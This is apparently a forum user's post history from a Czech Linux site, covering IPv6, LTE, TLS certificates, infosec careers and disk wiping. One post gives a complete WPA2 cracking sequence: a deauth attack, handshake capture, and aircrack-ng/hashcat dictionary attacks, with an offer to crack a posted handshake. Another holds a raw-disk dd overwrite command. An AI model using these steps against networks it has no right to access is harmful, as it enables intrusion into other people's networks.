Příspěvky

1321

Sítě / Re:IPv6 a rok 2020

« kdy: 22. 11. 2019, 19:52:50 »

Hlavní důvod proč vázne nasazení IPv6 je podle mě prostý fakt, že není reálné tyto IP ručně nastavovat, snadno číst nebo si je dokonce pamatovat.

Já doufám, že se díky tomu rozšíří podpora různých multicast DNS, bezbolestné integrace DNS s DHCP/VPN/whatever servery atd. a díky tomu si nebudu muset pamatovat ani IPv4 adresy.

Neznám asi nikoho kdo by dokázal myslet v šestnáctkové soustavě.

Naopak, když mám v IPv4 masku, která nevychází na celé bajty, tak musím použít ipcalc (nebo si to napsat na papír když to byla písemka ze sítí ve škole . U IPv6 se „nekulaté“ sítě z hlavy dají počítat snadno. A jestli je na konci „af“ nebo „175“ je mi osobně celkem jedno.

Všichni to máte standardně zapnuté v mobilu

Já si teda u T-Mobile ani Vodafone IPv6 na 3Gčku nevšiml, ale možná mám blbě nastavené PPP (nijak aktivně jsem po tom nepátral).

1322

Sítě / Re:LTE Pevný Internet na Doma

« kdy: 22. 11. 2019, 15:44:18 »

Chtěl bych se proto zeptat, jestli to co tvrdí Vodafon, je opravdu pravda a jsou schopni poskytnout takovou rychlost

Je to možné. Každý operátor má vlastní frekvenční příděl, a je možné, že T-Mobile ho vyčerpal, ale VF má ještě volno.

Zkuste někde sehnat simku od Vodafone, s možností dat. Zkuste ji v telefonu blizko místa, kde máte antenu od Tmobile.

Pokud ten tarif nebude mít nějak omezovanou rychlost, tak byste měl s aplikací na měření rychlosti internetu být schopný změřit rychlost Vodafone.

To ještě neříká nic o tom, 1) jak se to bude chovat ve špičce, 2) jestli tě nasměrují právě na tuto BTS.

Stejně je to bizarní, T-Mobile by 100% mohl nabídnout že tě oshapují na 50 a na 20 to klesne když má BTS plno. Což bude nejspíš občas večer.

1323

Software / Re:Jak znemožnit detekci anonymního režimu

« kdy: 21. 11. 2019, 20:34:42 »

Jak je vůbec možné, že to poznají a jak se tomu bránit?

Spouštět browser ve virtuálu, před spuštěním udělat snapshot, poté vrácením snapshotu provést zapomenutí.

Méně paranoidní varianta: udělat Firefoxu profil (firefox -P) v ramdisku, zapomenutí provést zrušením ramdisku.

1324

Distribuce / Re:"dlouhotrvající" konzervativní distribuce na desktop pro pokročilého uživatele?

« kdy: 17. 11. 2019, 23:35:08 »

Debian - nebývá tam problém s non-free softwarem a knihovnami?

Nebývá.

1325

Server / Re:Webový server - s www nebo bez a RapidSSL nebo LetsEncrypt?

« kdy: 10. 11. 2019, 06:02:14 »

A teda dnes specifikovat ze chci na onom serveru pristupovat ke sluzbe world wide web a ne k jine na stejnem serveru bezici?

Výběr služby na serveru se dělá pomocí portu. Nemyslel jsi spíš na doméně?

A jinak pěkné mi přijde dělat to pomocí SRV záznamů, například XMPP/Jabber už to tak dělá, e-mail v podstatě taky (byť se to z historických důvodů jmenuje MX). Bohužel to prohlížeče nepodporují. Ale abych pravdu řekl, nepřijde mi, že bych v praxi narážel na případy, kdy by se taková věc nějak zvlášť hodila.

1326

Server / Re:Webový server - s www nebo bez a RapidSSL nebo LetsEncrypt?

« kdy: 08. 11. 2019, 09:57:10 »

Pro nastaveni SSL certifikaty se kdyz tak mrknete na https://certbot.eff.org/ take automaticky obnovi certifikat, netreba vytvaret skripta

Osobně jsem nikdy automatické a příliš inteligentní věci neměl v oblibě, přišlo mi složitější zjistit jak ta automatika funguje a jak ji donutit fungovat tak jak chci, než si těch pár řádků shellu napsat sám (YMMV). Pokud by to tazateli přišlo příliš složité a magické, doporučuji kouknout na druhou stranu spektra, acme-tiny.

Bude ten eshop viset primo na verejne IP adrese? Pokud ano, tak LE. Pokud ne, je potreba si to dobre rozmyslet.

Tohle jsem nějak nepochopil, může to rozvést?

1327

Server / Re:Webový server - s www nebo bez a RapidSSL nebo LetsEncrypt?

« kdy: 08. 11. 2019, 07:06:15 »

nejsem si jistý, jestli chci co tři měsíce hlídat, že mi nevyprší certifikát nebo jestli doběhl skript

Tohle mají dělat počítače, například cron. Mně jednou za dva měsíce přijde mail, že byl certifikát obnoven, a nebo že to selhalo, což ale zatím vždycky ukazovalo na jiný problém, který se tím odhalil v čas a díky tomu byl preventivně vyřešen než si toho někdo všiml.

platnost certifikátu dva roky je možná lepší ne?

Ale zase to musíš dělat ručně, protože na rozdíl od LE nemají žádný široce podporovaný automaticky protokol, a ještě k tomu řešit platby (?). Takže ve výsledku s tím podle mě bude větší opruz než nastavit nějakého automatického klienta pro LE a dát to do cronu.

Pak je tu teda ještě otázka podmínek služby a potenciálních milionových škod: LE má v podmínkách, že když ti unikne privátní klíč a někdo je kvůli tomu zažaluje, musíš jim platit soudní výlohy, řešit právní zastoupení (v USA) a vůbec s tím bude spousta nepříjemností. Podmínky RapidSSL jsem nečetl, nepoužívám je. Na druhou stranu tohle má v podmínkách kde kdo (namátkou Thingiverse, GitHub, Trello, GitLab) a ještě jsem neslyšel o nikom, komu by se to stalo.

1328

Sítě / Re:Jaký hardware pro správu sítě u rodičů

« kdy: 07. 11. 2019, 21:04:54 »

Ten Mikrotik, protože na tom UBNT je OpenWRT v nějaké experimentální fázi a asi nebude moc fungovat.

1329

Studium a uplatnění / Re:Uplatnění v oblasti kybernetické bezpečnosti -- bez, nebo s VŠ?

« kdy: 06. 11. 2019, 09:25:44 »

To je tohle?

1. Základní pojmy počítačů a programování; programy a programovací jazyky, jazyk Java; konvence a komentáře; datové typy; proměnné, deklarace, přiřazení, operátory
2. Terminálový vstup a výstup; příkazová řádka; balíky a import tříd; struktura projektu v IDE; JAR
3. Základní matematické funkce; náhodná čísla; řídící struktury (větvení a cykly)
4. Příklady na větvení a cykly
5. Metody, návratová hodnota, parametry, přetížení metod; magická čísla a konstanty
6. Třídy a objekty; výčtový typ; uspořádání paměti
7. Pole, vícerozměrné pole, pole objektů; ověřování správnosti programu, ladění
8. Příklady na pole, metody a objekty
9. Řetězce; práce se znaky; postup při návrhu algoritmu
10. Řazení, výběrem, vkládáním, záměnou; vyhledávání, binární a sekvenční
11. Výjimky; práce se soubory a složkami; souborový vstup a výstup
12. Zobrazení dat v paměti počítače, kódování celých a reálných čísel, znaků; porovnání objektového a procedurálního programování

1330

Studium a uplatnění / Re:Uplatnění v oblasti kybernetické bezpečnosti -- bez, nebo s VŠ?

« kdy: 06. 11. 2019, 09:09:09 »

Jen úvaha, co je to programátor?

Šlo mi spíš o to, jestli člověk musí být vyloženě programátor (i když je to pochopitelně velké plus), aby se mohl angažovat v bezpečnosti IT, studiu kyberkriminality atd.

Nejde o to, abys uměl udělat, já nevím, e-shop s CRM velikosti Alzy nebo video editor. Ale jako infosec člověk budeš neustále psát různé skripty a menší nástroje (řekněme tak do pár stovek řádků). Plus bys měl vědět jak to zhruba vypadá když se programují větší věci, byť je nemusíš rozhodně umět navrhnout, abys věděl co za bezpečnostní chyby a jak se tam dá udělat, jak je najít, zneužít a opravit. Netuším, jak vypadá programování v prvním semestru na FAV ZČU, ale obávám se, že to bude podmnožina tohoto a pokud s ním máš problémy, tak to půjde fakt blbě.

A že existují takoví ti „manažeři“ co v životě nic nenapsali, nerozumí věcem a jenom dávají nefunkční rady, kterými se všichni musí řídit? No jestli chceš jít touhle cestou…

Pak je tu ještě možnost že ti ta škola nesedla nebo je objektivně špatná/špatný učitel. Zkoušel jsi samostudium? (to taky budeš muset dělat furt, protože škola tě nemůže na budoucí trendy připravit) Šlo to?

1331

Software / Re:Logování hesla hotspotu

« kdy: 06. 11. 2019, 08:31:08 »

Deauth klienta (vyprovokuje handshake) a zkusit to vyslovníkovat. Pokud mají dobré heslo, tak smůla. Jako slovník se mi osvědčil https://github.com/berzerk0/Probable-Wordlists + 8místná čísla + by se hodilo najít si nějaký speciální český slovníček (svůj ti bohužel dát nemohu ale pokud postneš handshake, tak ho možná zkusím projet).

Kód: [Vybrat]

- iwlist scan, protože pak už to v monitor mode nepůjde
- airmon-ng start wlan0 - vytvoří wlan0mon
- airodump-ng wlan0mon --bssid XX:XX:XX:XX:XX:XX --channel 8 --write /tmp/wifi
- volitelně aireplay-ng -0 1 -a MAC_AP -c MAC_KLIENT wlan0mon (deauth)
- aircrack-ng /tmp/wifi-01.cap -w /tmp/wordlist.txt
- nebo ./hashcat-utils/src/cap2hccapx.bin /tmp/wifi-01.cap /tmp/wifi.hccapx; ./hashcat -m 2500 -a 0 /tmp/wifi.hccapx /tmp/wordlist.txt

Pak ještě byly nějaké zranitelnosti ve WPS pinech, což jsem nezkoumal. Pokud si nainstaluješ wifite (poslední verzi), mělo by to samo všechno otestovat.

1332

Software / Re:Logování hesla hotspotu

« kdy: 05. 11. 2019, 12:59:52 »

1) Pokud na primárně linuxové fórum dáváš nějaké příkazy pro jiný OS, je dobrým zvykem stručně popsat, co dělají. Já si třeba prvně myslel, že mluvíš o captive portálu, ale odhaduji, že netsh [...] key=XXX nastaví WPA2 síť. Nebo WEP? Kdo ví.

2) Pokud jde o WPA2, tak to schválně nejde, pro vysvětlení hledej wpa2 4way handshake.

1333

Studium a uplatnění / Re:Uplatnění v oblasti kybernetické bezpečnosti -- bez, nebo s VŠ?

« kdy: 04. 11. 2019, 15:10:47 »

Po měsíci a půl studia ale zjišťuji, že absolutně nezvládám matematiku a programování na mě začíná být příliš náročné... Moje otázka tedy zní: existuje nějaká cesta (s titulem nebo bez), jak docílit uplatnění v této oblasti, bez toho abych se musel prodírat vysokoškolskou matematikou?

Bez matematiky asi jo (jenom málo práce bezpečáků je dneska opravdu o analýze algoritmů a navrhování matematických útoků), ale bez programování těžko. A to pokud možno jak praktické programování, tak různá ta teorie kolem algoritmů a datových struktur.

1334

Software / Re:Porovnání textu

« kdy: 03. 11. 2019, 22:10:04 »

"$(<apostrov.txt)"

Ježišikriste. Uvozovky se normálně escapují pomocí \".

Ale vlastně jo, oceňuji kreativitu. Moje programování věcí kterým nerozumím asi občas působí podobně :-)

1335

Distribuce / Re:Vymazání HDD před prodejem NB

« kdy: 02. 11. 2019, 16:10:43 »

Přepsat nulami pomocí dd.

Kód: [Vybrat]

dd if=/dev/zero of=/dev/sdX

Dal bych bs=1M, jinak se dělá read a write po 512B blocích a to je pomalé (teď jsem to zkusil opačně a kupodivu ne zas tak moc, ale stejně).

Jinak osobně bych udělal dvě přepsání /dev/urandom nebo jedno /dev/urandom a jedno /dev/zero.

To spustí interní mazání všech bloků, které jsou pak bezpečně vyresetovány a data jsou pryč.

To není garantované, a v praxi to nejspíš bude fungovat tak, že SSD bloky označí za smazané, ale skutečně je bude mazat buď pomalu na pozadí, nebo až budou potřeba.

Kromě výše zmíněných je ještě možné využít vlastnost disků, které umí vnitřní šifrování. Stačí jim poslat příkaz, aby změnily šifrovací klíč a data co tam jsou dosud jsou najednou smetí.

Tohle taky není dobrý nápad, ukazuje se, že doslova desítky modelů „samošifrujících disků“ ve skutečnosti vůbec nešifrovaly, šifrovaly veřejně známým klíčem, klíč z nich šlo snadno zjistit atd.
https://news.ycombinator.com/item?id=18382975
https://www.ru.nl/publish/pages/909275/draft-paper_1.pdf
https://spritesmods.com/?art=security
http://www.zdnet.com/article/encryption-busted-on-nist-certified-kingston-sandisk-and-verbatim-usb-flash-drives/
https://eprint.iacr.org/2015/1002.pdf